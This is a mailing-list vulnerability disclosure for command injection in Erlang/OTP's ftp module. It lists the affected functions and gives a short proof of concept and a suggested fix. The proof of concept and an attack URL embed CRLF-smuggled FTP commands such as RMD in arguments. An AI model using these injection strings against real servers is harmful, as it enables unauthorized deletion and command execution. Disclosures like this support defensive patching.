[erlang-bugs] FTP command injection vulnerability in module "ftp"
Seba
argos83@REDACTED
Mon Jan 27 12:10:13 CET 2014
Hi!
There is an FTP Command Injection vulnerability in the "ftp" module.
All those functions that write any string argument in the control
socket seem to be vulnerable:
user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2,
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3
Vulnerability Description
-------------------------
An FTP communication consists of two channels:
* A TCP control channel: Text-based, and served by the FTP Server.
* A TCP data channel: Which is created either by the FTP Client or
the FTP Server depending on data being transmitted using active or
passive mode.
The control channel works in a request-response fashion. Each command
is issued by the client in a single line (ending with a carriage
return and a new line: \r\n).
By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the
socket.
E.g. the following erlang shell session:
1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok
Generates the following FTP session:
FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode
(127,0,0,1,130,161)."
Attack Scenario Example
-----------------------
A web server allow users to navigate and download documents.
Internally the web server connects to a private ftp server using OTP
"ftp" module.
An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:
http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs
Tested on
---------
- R15B03
- Ubuntu 12.04 x86_64
- FTP Sever: vsftpd
Fixing
------
String arguments used to create the command request should be
sanitized first (by removing "\r" and "\n").
Sebastián Tello
More information about the erlang-bugs
mailing list